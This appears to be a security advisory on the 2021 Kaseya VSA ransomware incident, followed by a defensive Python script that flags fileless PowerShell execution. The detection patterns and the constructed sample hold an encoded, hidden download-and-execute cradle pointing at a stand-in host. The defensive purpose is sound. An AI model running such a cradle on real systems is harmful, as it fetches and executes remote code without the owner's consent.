July 2nd, 2021: CyberHoot received notification today of a critical breach affecting businesses through Kaseya, the third-largest Remote Monitoring and Management (RMM) vendor. While it remains unclear how hackers breached Kaseya’s solution, what is clear is that at least 8 MSPs and 200 clients are dealing with a ransomware attack. Kaseya support has asked all clients to shut down their local VSA management consoles, after having shut down its own cloud environment earlier today. Early indications are that remote access, combined with stolen credentials and administrative privileges, enabled the hackers to carry out this ransomware attack. It has been reported on Reddit and other sites (unsubstantiated) that the hackers used Kaseya and/or Webroot to execute Sodinokibi ransomware through PowerShell scripting. CyberHoot will continue to monitor this situation and update this article.

What To Do

If you are a Kaseya client, per this Client Advisory, you must shut down your VSA server immediately and keep it shut down until further notice.

Execution through PowerShell would likely not be stopped by several security solutions, because the malware runs inside a trusted scripting engine rather than as an executable file written to disk. To effectively avoid this threat, deploy a security solution that includes a fileless malware prevention component.
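To show why script-based execution needs script-aware detection rather than file scanning alone, here is an added Python example (not CyberHoot's, Kaseya's or Webroot's code) that triages PowerShell Script Block Logging text (Windows Event ID 4104) for common fileless-execution indicators, decoding an -EncodedCommand argument so the hidden script is inspected as well; the sample script blocks and the indicator list are constructed for the example.

```python
import base64
import re

# Heuristics for script-based (fileless) PowerShell execution as recorded by
# Script Block Logging (Event ID 4104). They are triage signals, not proof.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
    "policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass|-nop\b|-NoProfile\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "defender_tamper": re.compile(r"Set-MpPreference\s+-Disable", re.I),
}
# -EncodedCommand (or a short form) carries a base64 blob of UTF-16LE script text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

def decode_utf16_base64(blob):
    """Decode an -EncodedCommand argument; return None if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def match_indicators(text):
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def scan_script_block(text):
    """Return the sorted indicator names found in one script block."""
    findings = set()
    m = ENCODED_ARG.search(text)
    if m:
        findings.add("encoded_command")
        decoded = decode_utf16_base64(m.group(1))
        if decoded is not None:
            findings |= match_indicators(decoded)  # inspect the hidden script too
        text = text[:m.start(1)] + "<blob>" + text[m.end(1):]  # keep regexes off the base64
    return sorted(findings | match_indicators(text))

def triage(script_blocks):
    """Map block index -> findings for every block that has at least one hit."""
    return {i: f for i, f in enumerate(map(scan_script_block, script_blocks)) if f}

# Constructed sample script-block texts (not taken from the incident).
HIDDEN = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/u.ps1')"
SAMPLE_BLOCKS = [
    "Get-Service -Name Spooler | Select-Object Status",
    "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -enc "
    + base64.b64encode(HIDDEN.encode("utf-16-le")).decode("ascii"),
]
```

Calling `triage(SAMPLE_BLOCKS)` reports findings only for the second block, including the cradle that is visible solely after decoding the encoded argument.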